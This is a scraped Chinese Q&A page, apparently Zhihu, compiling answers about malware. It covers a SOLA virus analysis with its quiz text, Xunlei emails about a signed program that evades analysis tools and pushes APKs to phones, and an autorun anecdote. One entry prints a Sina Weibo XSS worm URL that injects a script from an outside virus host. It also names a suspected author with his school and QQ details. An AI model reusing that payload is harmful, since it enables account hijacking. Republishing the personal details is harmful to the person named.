男主角在入学第一天就听到女主角惊天动地的发言,并加入了女主角创建的一个社团,这个社团教室原本是文学社的,但被女主角强行占用。主要社团成员有:眼睛娘、很有气势的社长、有着魔鬼身材,比男主角高一个年级的吉祥物、被社长指挥得团团转的男主角。&br& 请问这个社团叫什么团?(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题3---------------------&br&
如果用B、C分别代表2种人或物体的名称,那么每隔一段时间,就会有7个被B选中的人参加一种名为B战争的战斗,获胜者可以获得B,而C是B召唤出来的,拥有强大的力量,帮助主人为了B而战斗。&br& 请问这部作品的名称的前4个英文字母是什么?&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
如果用A表示一个名词,那么有一部作品的名称为A少女,A少女们互相战斗,夺取对方的A之心,没有A之心的少女会永远沉睡,一个A少女收集齐了其他A少女的A之心之后,就有某种事情要发生。&br& 请问A的汉语拼音字母是(8个字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
有一种战斗机,只有神经系统接受了改造的人才能驾驶。4个孩子作为该战斗机的驾驶员展开训练,3个孩子先后在事故中丧生。军方为了给最后一个孩子作战的理由,让她转入了某学校。她于一个晚上,在学校的游泳池里遇到了男主角。后来,女主角加入了一个社团,该社团连同女主角共有4人。&br& 这部作品名称中有3个英文字母,请问这3个英文字母是?&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
患病的男主角在医院里遇上患病的少女,并和她一起逃出医院,到达了某地。这个地方盛产某种花,而女主角也喜欢这种花。传说这种花是一个美男子被诅咒而变成的。&br& 请问这部作品的名称是?(8个英文字母。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题3---------------------&br&
男主角遭遇车祸,醒来后发现世界已经变成地狱一般的景象,往昔的朋友变成了怪物。只有女主角在他的眼中才是正常的人类。于是,他守护着自己心中唯一的真实。&br& 请写出这部作品的女主角的名字的中文拼音。(5个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
有如下词语来描述B:很小,有薄薄的翅膀,下雨也不会被淋湿。有如下词语来描述A:一种乐器,要靠魔力来演奏,与人声搭配最为恰当。而C是一个一年四季都下着雨的城市,D是一所音乐学院。&br& 请写出故事情节中同时包含A、B、C、D的作品的中文名称的前三个字的汉语拼音字母。(12个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
在N年以后,人口暴涨。有些人就按下导弹开关,使细菌兵器袭击了地球,最终引起了一场恶战。在地球上的人类已经所剩无几的时候,有一个人为了寻找战前人类留下的有用物品,进入了一个废墟都市。在那里,他遇到了一个天象馆里的礼仪机器人,并和她发生了一段故事。&br& 这部作品名称的中文拼音是?(11个字母。字母中间不要加空格。其中第一个字是后鼻音。)&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br&
你的成绩是
分,不及格!!!!!!!!!!&br& ?
不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!&br&-------&br&
您的成绩是
分,及格了。&br& ?
谢谢您完成了这套试题。5秒钟后,我将按照契约,删除自己。&br& ?
希望您能够过得愉快,再见。&br& ?&br&&br&&br&相信你即使不懂编程也能看懂其中的意思了.晕死......这个文件看样像一个懂汉语的,在中国不知受到什么压迫的外国人写的,具体我也不清楚.反正真是让人看了起一身冷汗......&br&在解压出的众多文件中,有一个很特别的SolaKiller.rar,看文件名像是病毒作者自己写的杀毒工具,可是有压缩密码.好在在sola.bat的代码中找到了解压指令:就是刚才说的至关重要的rar x -hpkakenhi200601 %setup%\SolaKiller.rar一句&br&解压后看到2个文件夹和1个文件:&br&文件夹:ToProgram&br&
ToSystem32&br&文件:Install.bat&br&其中ToProgram文件夹里的SolaKiller.bat就是病毒作者自己写的专杀工具.运行就可以杀毒了.&br&&br&----------------------------------------------&br&结论:&br&1.这病毒太让人无语了.特别是从Function.dll中解压出的TENBATSU.BAT,KillVirus.TXT和SolaKiller.rar三个文件,真不知道病毒作者在中国经历了什么事,竟会写出这些话.晕......对这个我就不做评价了&br&2.从技术上来看,病毒通过一层一层的压缩包和更改扩展名来伪装自己.还是有一定免杀能力的.起码病毒库的360杀毒没查出来.&br&3.病毒破坏性确实不小,不过好在病毒自己提供了专杀工具,只是藏起来了.万一自己的计算机真中了SOLA病毒也不用着急.首先发现不对劲之后就不要再进入系统了.用一张WinPE启动盘启动计算机,再运行专杀工具就行了.&br&4.即使发现的晚,开机之后已经出现上面TENBATSU.BAT文件所示的那几个问题了也不用急.经过我的破解,现在那几个问题的正确答案和专杀工具已经被我提取出来了.需要的话可以找我要.我的QQ:&br&5.截止现在()已升级到最新病毒库的NOD32和360杀毒都还不能自动查出该病毒。目前唯一的预防措施就是关掉系统的自动运行,Windows Vista,Windows 2008和Windows 7的用户可以开启UAC,WindowsXP用户可以安装带有主动防御功能的杀毒软件(比如卡巴),并打开防火墙。这样基本就没有问题了。&br&&br&============日志结束的分割线=============&br&&br&&br&&br&第一次看的时候不能理解,&br&现在想想大概是一个喜爱的日漫被广电封了以后愤怒无处发泄的宅男写的东西吧
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号
)。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:/*长文预警!好多人说看不下去这么多代码,确实代码…
360不就是以毒攻毒吗?
360不就是以毒攻毒吗?
来自子话题:
在那遥远的 win95/98 时代,有个叫 CIH 的传说
在那遥远的 win95/98 时代,有个叫 CIH 的传说
以下为雷锋网 2013 年 8 月 1 日文章(目前已被删除),摘自谷歌缓存:&br&&br&&b&《迅雷惊现“掘雷者”
高层包庇共谋私利》&/b&&br&&br&继京东商城那位叫吴声的同志首创了“食京者”后,迅雷也出现了“掘雷者”。近日,迅雷看看就有高层利用职务之便对看看的用户进行了病毒般的强制插入,捆绑了众多软件,行为极其恶劣,已构成了职业犯罪。但可笑的是,这个事在迅雷内部竟然没起任何波澜。&br&&br&不知道是公司反应慢,还是这些人只手遮天的能力实在太强。不多说了,看下边内容。(编者注:以下内容为迅雷内部针对此事的内部邮件)&br&&br&&ul&&li&&b&邮件一&/b&&br&&/li&&/ul&&br&这封邮件是工作人员在收到迅雷看看的用户反馈,分析后发送邮件抄送迅雷各大高管以及迅雷看看高管,认为此事件是给用户安插病毒,给个别人谋取私利。&br&&blockquote&昨天接到用户反馈,发现一个位于 C:\Windows\System32 目录下,名为 “INPEnhSvc.exe” 带有迅雷数字签名的文件。(见附件INPEnhSvc.exe)&br&&br&我们从用户机器上将此文件取回,经技术人员逆向分析,发现该文件有病毒行为。&br&&br&“INPEnhSvc.exe” 是一个服务,加 /regserver 参数可注册启动。&br&&br&启动后有3次服务器连接,访问2个域名分别为: &br&&a href=&http://conf.& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&conf.&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&(下发配置文件)&br&&a href=&http://kkyouxi.& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&kkyouxi.&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&从&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&中拉取2个配置文件。(见附件1 2 3.txt)&br&&br&1.txt 配置了程序行为,检测到 “taskmgr.exe|tasklist.exe|procexp.exe|procmon.exe|devenv.exe|windbg.exe|filemon.exe|ollyice.exe|ollydbg.exe|processspy.exe|spyxx.exe|cv.exe|wireshark.exe” 等分析工具会自动退出,防止被发现。&br&&br&2.txt 配置了如下 apk,满足某些条件,该程序会后台下载安装 adb(安卓手机驱动),并将如下 APK 自动安装到连接至当前计算机的手机上。&br&&a href=&http://down4./wm/4/4/JYqpdtV2.0.0.38_ddz_Android_Build_& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&down4./wm/4/4&/span&&span class=&invisible&&/JYqpdtV2.0.0.38_ddz_Android_Build_&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&0bd246.apk(九游棋牌大厅)&br&&a href=&http://dl./business/91soft/91assistant_Andphone_lite134.apk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&dl./business/9&/span&&span class=&invisible&&1soft/91assistant_Andphone_lite134.apk&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&(91手机助手)&br&&a href=&/360sj/adm/apk//com.qihoo.appstore& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/360&/span&&span class=&invisible&&sj/adm/apk//com.qihoo.appstore&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&_149.apk(360手机助手)&br&&a href=&/down/1263/uuwldh_1263.apk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/down/126&/span&&span class=&invisible&&3/uuwldh_1263.apk&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&(UU网络电话)&br&&a href=&/gfan/product/a/gfanmobile/beta/GfanMobile_web414.apk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/gfan/prod&/span&&span class=&invisible&&uct/a/gfanmobile/beta/GfanMobile_web414.apk&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& (机锋应用市场) &br&&br&程序内还有”设置IE首页、创建桌面快捷方式、添加IE收藏夹“等行为,都由 2.txt 这个配置文件配置。&br&&br&外界已经有人注意到该文件,我们昨天已经排除文件通过迅雷7客户端部署的可能性,但由于带有迅雷数字签名,会导致用户迁怒于迅雷7,将迅雷7卸载。&/blockquote&&br&&ul&&li&&b&邮件二&/b&&br&&/li&&/ul&&br&这封邮件是迅雷开发部门一位高管非常愤怒,将此邮件上升了高度,并认为有人在利用职务之便进行商业犯罪,要求彻查此事。&br&&blockquote&发现带有迅雷数字签名的未知文件,经分析有病毒行为我和我的小伙伴们都惊呆了!!代表迅雷的一名开发人员表示震惊和愤怒!!!!&br&&br&从该exe的特征和行为来看,属于典型的后门软件和病毒,并且使用类似云指令的技术来强制后台推送用户不需要的东西,来达到不可告人的目的,堂堂迅雷竟然能出现如此无耻下流的软件,若被杀毒软件拦截列入黑名单,后果不堪设想,迅雷长期积累的信誉将毁于一旦!迅雷公司的数字签名也可能陷入万劫不复的境地,祸及公司广大的产品包括迅雷7、xmp以及BOLT引擎等等众多产品和模块,不能不让人震惊!&br&&br&该软件带有迅雷数字签名,只有两种情况,一种是泄露数字签名导致,一种是内部员工和团伙所为。从规模来看,涉及到客户端开发(并且具有一定的反逆向保护)、外网服务器,云指令推送,服务器管理后台等技术,并且使用了&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的域名,推送apk肯定还涉及商业利益链包括揽活、销赃等,所以可以确定内部团伙作案的可能性非常大,凭一己之力很难做到这么大规模,并且外网高手即使有数字签名,也不大可同时控制&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&下的域名。&br&&br&客户端样本我也拿到一份,不得不说可笑,只凭此鸡鸣狗盗的雕虫小技就想鱼目混珠,瞒天过海?置迅雷的广大开发人员于何处?后台自动下载apk强制安装,众所周知当前手机应用推广的利润率惊人,单次安装激活就有1元到数元,所以这个软件究竟在发现之时已经散步到多大市场?后面的灰色利益链又是如何?幕后黑手又是谁?&br&&br&从google搜索结果来看,外网已经有众多用户反馈和抱怨,从反馈用户的ip来看,多是出于二三线小城市,真是用心良苦!!!如果是内部员工所为,那么作为迅雷的开发人员,以权谋私,利用公司的渠道尤其是下载部的迅雷7来满足私欲,为所欲为,不计后果,缺乏最基本的职业素质,令人不齿!&br&&br&恳请公司彻查此事,给所有开发人员一个交代: &br&&br&1.请专业杀毒软件公司比如金山来分析病毒样本,出具病毒分析报告&br&&br&2.从&a href=&http://kkyouxi.& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&kkyouxi.&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&域名出发,顺藤摸瓜找出作案人&br&&br&3.发掘该病毒的利益链条,找出幕后黑手&br&&br&4.严格控制数字签名,采用更安全的机制来控制签名流程,保证所有被签名文件可回溯,杜绝可能的数字签名泄露&/blockquote&&br&&ul&&li&&b&邮件三&/b&&br&&/li&&/ul&&br&这封邮件是迅雷看看先是找了某中层出来顶罪,并找各种理由来搪塞。&br&&blockquote&首先先给大家道歉一下,此次事故是近期我们推出的OFFICE插件的产品BUG所导致的问题,INPEnhSvc.exe是Office插件系统的守护程序,负责拉取配置与上报统计;INPEnhUD.exe是自升级程序,负责拉取升级配置升级Office插件系统。但旧版本的升级程序有Bug,导致守护程序不存在时拉起会弹框报错,守护程序自身也有内存泄漏的问题,所以在25号发了一个自升级版本修复这两个问题,降低对用户的影响,目前产品还在持续完善中。 &br&&br&至于推送九游棋牌大厅、91手机助手、360手机助手、UU网络电话、机锋应用市场的事情,是之前经过F总审批用于置换对应平台广告位置,来推广无线看看APK之用。2013年我们设定的无线看看的日新增目标数量达 到15万每天,根据之前邮件中的价格1元到数元来看的话,那么一天就是15万元RMB起,一个月就是450万,一年就是5400万RMB。而公司给到的预算只有800万用于无线推广,目前还都用在了和品牌硬件厂商合作预装上面,如果不通过换量很难完成任务目标。同时,迅雷所有无线产品的量都非常小,很难实现等价兑换,无奈之下才破例采取插件推送的形式进行换量操作。&br&&br&其中九游棋牌大厅为UC浏览器的产品,其他的就不用介绍了,通过帮他们推广手机端应用,他们来帮我们推广无线看看,达到换量的目的。从实际效果来看,我们帮他们带量的情况很不乐观,部分平台仅为他们帮我们带量的十分之一。下面是他们帮我们推广产品的截图,带量情况及推广的排期表(实际执行远大于这些排期),请大家查看!&br&&br&最后,由于功能BUG给用户带来的问题,我们25号的升级版本已经解决,目前正在升级中,在此我们也深表歉意。但是仍然由衷希望大家在没调查好事实真相前,不要随意猜测,这样不仅影响内部团结,而且不利于解决已经发生和未来有可能会出现的问题,谢谢!&/blockquote&&br&&ul&&li&&b&邮件四&/b&&br&&/li&&/ul&&br&这封邮件是迅雷客户端一位高管对迅雷看看中层顶罪表示愤怒,并将该事危害程度拔高。&br&&blockquote&作为迅雷客户端的维护人员,无论是谁出于何种初衷通过何种手段部署了这个程序,从结果上来看,迅雷客户端的声誉已经首当其冲的受到了严重损害,已经成为用户怒而卸载迅雷的原因,已是我的职责所在,很关心这个事情的进展。&br&&br&现在已经澄清了是业务团队为了更好的实现置换推广为之,并非严重的安全问题。本来可以藏的很好,不被用户,甚至自家的开发人员感知,只是因为出了内存泄漏的bug才被大家关注起来,把bug解了这事就解决了?能否定这是一种病毒行为?藏的再好,也怕用户找;杀毒软件现在没报,以后就不会报?现在反馈的少,以互联网的传播速度也许哪天就大爆炸。&br&&br&及早被发现难道不是好事?迅雷平台有很多更加正常,更加优雅,更加对用户友好的的推广渠道,为何不考虑? 看一下这个程序的行为:带着迅雷的数字签名,以迅雷的名声作保,做的是静默下载并且安装App到用户手机,更改用户收藏夹之类的事情,加上一些反调试保护,无法停用无法删除。&br&&br&这是严重伤害用户体验的活脱脱的病毒行为,不知情的开发人员看到这种程序的第一想法一定是“这是个病毒呀,迅雷不应该干这个,太伤名声了”,“谁为了啥干的”之类的猜测是非常正常的,为公司利益着想讨论问题细节并且希望彻查以儆效尤为先而作言,而不是为了所谓团结而沉默。&br&&br&置换推广的策略是非常正确的,我想这也是领导审批通过的原因吧。但是执行手段是这样的病毒行为,和公司推行用户体验至上的原则是背道而驰的。&br&&br&迅雷一丝一毫的用户体验改进都是各位同学殚精竭虑通宵达旦的辛苦付出得来的,迅雷一点一滴的用户口碑积累都是经年累月长期沉淀出来的,为了节省金钱和时间成本,采用这样的手段,对用户体验和迅雷口碑的伤害难道不是让公司付出了更大的成本?不是审毫毛小计而遗天下大数?岂非饮鸩止渴杀鸡取卵,涸泽而渔焚林而猎?&br&&br&如果这样的行为被认可,必然有人趋之如骛,置公司的整体利益于何地,其他同学的劳动于何地?想到这个令人不寒而栗。&br&&br&由衷希望以病毒形式来推广的做法立即停止,而不是改了bug继续来。 位微言轻,不吐不快。&/blockquote&&br&&ul&&li&&b&邮件五&/b&&br&&/li&&/ul&&br&这封邮件是迅雷看看某高管将此事定性为业绩压力太大所致。&br&&blockquote&此次事故来自业绩压力所为,初衷是为了推广公司的无线产品,执行方式虽是无奈之举,但是确实伤害了用户体验,目前已经全面停止,后续将不会出现类似的情况,避免给公司带来损失,后续还请大家多多监督。&/blockquote&&br&&ul&&li&&b&邮件六&/b&&br&&/li&&/ul&&br&这封邮件是迅雷看看大boss再度对此事开脱。&br&&blockquote&首先,作为看看的负责人,这次的事情给了我一个深刻的教训,侥幸心理不能存在,对待任何事情都要思考得更全面。&br&&br&一方面,同意程浩的处罚规定,另一方面,看看开始就这次的事件建立起类似事情的流程,有监控的流程,相信至少很多误解不会存在。&br&&br&这个在一到两周内会给到大家结果。&br&&br&同时,从这次的邮件,我想提几个也许更深层次的问题:&br&&br&1、业务部门的发展需要大家的帮助和支持,这次的事件就属于高压力高考核下又找不到解决途径后,憋出来的烂招,结果是大家都受到了连累。&br&&br&我希望能借此事件将看看这边的一些急需的帮助提出来,大家一起探讨。 &br&&br&所谓堵不如梳,有大家一起帮忙,相信类似事件从驱动力上就会小很多。 &br&&br&看到大家很激动的情绪,相信大家都很想为公司好,为用户好,那么大家就一起参与,不如我们从根上去解决问题? &br&&br&2、欢迎大家提出意见和表达意见以及希望看到的结果,但是,还是希望大家不要乱猜测和猜疑,甚至匆忙间就把判定给下了,尤其是一些原则的问题上。&br&&br&这是一封公开邮件,公开邮件有话语人,就有听众,属于媒体性很强的邮件表达方式。&br&&br&在业务上推动用的方法不对是一回事,为自己谋私利是另外一件事情。两者最后的落点完全不一样。&br&&br&希望以后大家在这样类似的邮件里注意这个点,不是说不允许大家说,而是一些很重要的判断,可以先弄明白再表达观点。&br&&br&3、最后,想给大家说一说大家所不了解的看看一些情况。&br&&br&看看的发展其实我想很多人不了解,我也知道看看最近在受到很多公司其他部门的质疑,有发展问题,有团队问题,有管理问题,有道德问题,有产品问题……&br&&br&这里作为看看的负责人,我想也就此邮件为看看做一次简短的宣讲。&br&&br&在优酷土豆既定好赛道的长跑里,我们是跟得最辛苦的一家视频穷公司 &br&&br&我们用最少的花费版权的钱,得到了跟每一家视频公司差不多的内容(除开对方有钱可以做独家,除开MMPA打死不卖给我们的内容)&br&&br&我们用最少的市场费用现在做到了每天从外部给看看带量750万UV,这个上面我们是市场的第一名 &br&&br&我们用最少的人数在运营着视频门户的红海广告商业模式,一个从技术到产品到内容到市场到销售到编辑到成本控制都要面面俱到的商业模式。&br&&br&我们用最低的薪资待遇团聚着一帮对迅雷对迅雷看看还有感情的弟兄们,在艰苦奋斗&br&&br&……………………&br&&br&这样的模式下,整个团队发挥出的就是以前继承下来的土匪精神和强烈的生存欲望。&br&&br&这个相对应的,也造成了很多的不规范和给兄弟部门带来很大的困扰,&br&&br&这一点,是以后看看要杜绝和规范起来的。请大家相信 &br&&br&尽管跟得困难,但是不意味着我们就一定要傻傻的跟随到底,看看在未来的一两年内,还是一个基础目标,活下去!&br&&br&在活着的过程中,不断的寻找机会,给自己补血的同时看能不能找出属于自己的特殊赛道,这个是我最大的职责和责任。请大家相信,我能给大家一个满意的答案。&br&&br&希望在这个过程里,还是能得到大家的帮助和谅解&br&&br&最后,尽管大家的邮件里的质疑很尖锐,但是,至少有一点,对迅雷的感情从字里行间我能看到。&br&&br&我刚生的女儿,在医院里,医生的态度稍微有点不负责的时候,我也是怒火中烧的,所以,对大家的心情我也非常理解。&br&&br&所以,既然大家都把迅雷当做自己的孩子,真心的爱护和呵护,那我们不妨一起努力,寻找更好的方式来一起解决问题。&br&&br&一直以来,迅雷看看也是迅雷的一部分.&br&&br&我说几句:&br&&br&1、我们看看业务面临非常大的压力,这点我能理解并感同身受,其实不光是看看,其他产品也有。&br&&br&2、在有中国特色的商业伦理和“成功哲学”下,确实有些公司通过一些不规范的手段获得了巨大的商业利益,但是这不意味着我们应该效仿,我们总是有一条底线要坚守。&br&&br&3、知错就改是好事,但是不足够,犯了错误就要付出一些代价。 我们没能在公司内部树立一个核心价值观,是我的问题,我自罚30%月薪。另外看看的管理层也一并做出处罚,总的罚金池要match我的。具体请anter了解清楚事情原委后分配。所有罚金由peter暂管,未来进入看看的团队建设费用。 请peter安排HR同事来具体follow up一下。&/blockquote&&br&未完待续……不知道还会有什么样的人出来玩什么手段和说辞,如果有的话,我会持续更新。谢谢关注。 &br&&br&&ul&&li&&b&结语&/b&&br&&/li&&/ul&&br&迅雷看看拥有几亿的用户,此事牵扯到的黑色利益链条到底有多少?但此事竟然将在迅雷看看内部不了了之。无人挨罚,无人顶罪,无人遭辞,无人隐退,长此以往,迅雷必亡。
以下为雷锋网 2013 年 8 月 1 日文章(目前已被删除),摘自谷歌缓存:《迅雷惊现“掘雷者” 高层包庇共谋私利》继京东商城那位叫吴声的同志首创了“食京者”后,迅雷也出现了“掘雷者”。近日,迅雷看看就有高层利用职务之便对看看的用户进行了病毒般的强…
【背完日语单词了,这是最后一次更新】&br&我发现我并没有挑明观点,那么观点总结如下:&br&&a class=&member_mention& data-editable=&true& data-title=&@杨作会& data-hash=&aaad3fbfe4b1& href=&/people/aaad3fbfe4b1& data-tip=&p$b$aaad3fbfe4b1&&@杨作会&/a& 提供:&b&该文件数字签名通过了系统的验证,可以确定是迅雷公司写的。&/b&&br&&b&感谢指出行文错误,深夜叨扰,祝晚安。&/b&&br&&br&&br&第一、在评论92楼杨sama给的样本文件,通过HEDIT的确能看见迅雷看看的网址,&b&迅雷对于这事儿难逃其咎。&/b&&br&第二、这玩意儿连个系统内核都没进,危害完全没有那篇破报道里说的那么大, 那篇报道纯属抹黑成分远远大于叙述事实成分,&b&但是提供的样本文件的确与迅雷有关系&/b&&br&第三、&b&给的那个样本远远没有杀毒软件里藏的那些玩意对你的计算机危害大&/b&&br&第四、&b&我自己调试的结果&/b&是没有发现什么危险的API CALL,鉴于本人逆向水平实在令人捉急,这条&b&不能作为那个东西没危害的依据。&/b&&br&纯白交响曲爱理线去了,おやすみなさい、じゃね、みんなさん。&br&&br&&b&特别注意:我原来的答案(已被我自己删除)中给的答案中带有倾向性,倾向性是:迅雷干这事儿的可能性&u&&i&很小小到了近乎没有的程度。&/i&&/u&&/b&&br&&b&后来的事实证明,迅雷公司的下限超出了我的想象。因此这个倾向是明显错误的,敬请各位注意(也不知道你们还能不能看到了……)&/b&&br&&br&&b&原错误答案由于带有过强的倾向性我感觉会导致强烈误导,已被我删除。&/b&&br&&b&经过分析得出的观点上文已经说完了。&/b&&br&&br&&b&特别感谢92楼评论者提供病毒样本&/b&&br&&b&特别感谢&a class=&member_mention& data-editable=&true& data-title=&@杨作会& data-hash=&aaad3fbfe4b1& href=&/people/aaad3fbfe4b1& data-tip=&p$b$aaad3fbfe4b1&&@杨作会&/a& 指出文中错误并做知识补充。&/b&
【背完日语单词了,这是最后一次更新】我发现我并没有挑明观点,那么观点总结如下: 提供:该文件数字签名通过了系统的验证,可以确定是迅雷公司写的。感谢指出行文错误,深夜叨扰,祝晚安。第一、在评论92楼杨sama给的样本文件,通过HEDIT的确能看…
能。&br&&br&我五年级的时候,整天泡在小学的机房搞NOIP。那时候正好流行Autorun病毒,U盘那时候还是新兴的东西(至少当时的我还在拿着一张3.5inch双面高密度软盘满学校乱跑呢),Autorun病毒们就借着U盘和局域网还有装了硬盘保护系统从而没法打补丁(但是有几个分区是没有保护的所以病毒得以留存)的Windows XP满世界传播。&br&&br&但是Autorun病毒的入口点只有一个:autorun.inf(至少当时还是如此)。所以,不同病毒之间会互相争抢这个入口点,有时候就会出现autorun.inf被改动从而找不到文件的情况(互相攻击,互相删文件)。当时年幼的我用了四年级时候百度而得的显示属性为+S+H+R的文件的方法和一点点英语能力,顺利找到了病毒的运行机理。&br&&br&然后我写了个.bat把整个机房的残余病毒文件杀光光了。满满的成就感。
能。我五年级的时候,整天泡在小学的机房搞NOIP。那时候正好流行Autorun病毒,U盘那时候还是新兴的东西(至少当时的我还在拿着一张3.5inch双面高密度软盘满学校乱跑呢),Autorun病毒们就借着U盘和局域网还有装了硬盘保护系统从而没法打补丁(但是有几个分…
&a href=&/images/t.js& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/images/t.js&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&XSS代码:&a href=&/pub/star/g/xyyyd%22%3e%3cscript%20src=//www& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/pub/star/g/xy&/span&&span class=&invisible&&yyd%22%3e%3cscript%20src=//www&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update&br&&br&新浪名人堂部分XSS过滤不严&br&&br&攻击原理分析:&a href=&http://d.pr/Flsl& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/Flsl&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&源 .js 文件内容:&a href=&http://d.pr/rHiB& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/rHiB&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
(海均提供)&br&&br&========================================&br&&br&病毒作者微博
&a href=&/n/hellosamy& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/n/hellosamy&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& (已河蟹)&br&遗照 &a href=&/zjc5s4.jpg& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/zjc5s4&/span&&span class=&invisible&&.jpg&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&Domain Name: &a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&Registrant Organization: 北京新网数码信息技术有限公司&br&Registrant Name: 张志 &br&Administrative Email: &br&&br&疑似病毒作者信息:&br&I D名:lin5-61&br&真实姓名:朝森&br&性别:男&br&毕业院校及专业:武汉科技大学&br&职业:写代码(JAVA)&br&联系方式:QQ&br&&br&QQ空间: &a href=&http://user./& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&user./46142&/span&&span class=&invisible&&932&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& &br&问题:我是哪里人?&br&回答:海南。
脚本 XSS代码:.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update新浪名人堂部分XSS过滤不严攻击原理分析:源 .js 文件内容: (海均提供)=======================…
我确实认识一些不装安全软件的人。但他们都非常了解了解各种入侵手段,了解安全软件的利弊,了解在不装安全软件的情况下如何安全地使用计算机。&br&&br&但一般来说,不确定自己是不是应该装安全软件的人,都应该装安全软件。
我确实认识一些不装安全软件的人。但他们都非常了解了解各种入侵手段,了解安全软件的利弊,了解在不装安全软件的情况下如何安全地使用计算机。但一般来说,不确定自己是不是应该装安全软件的人,都应该装安全软件。
“搞计算机的,不过不会修电脑”。
“搞计算机的,不过不会修电脑”。
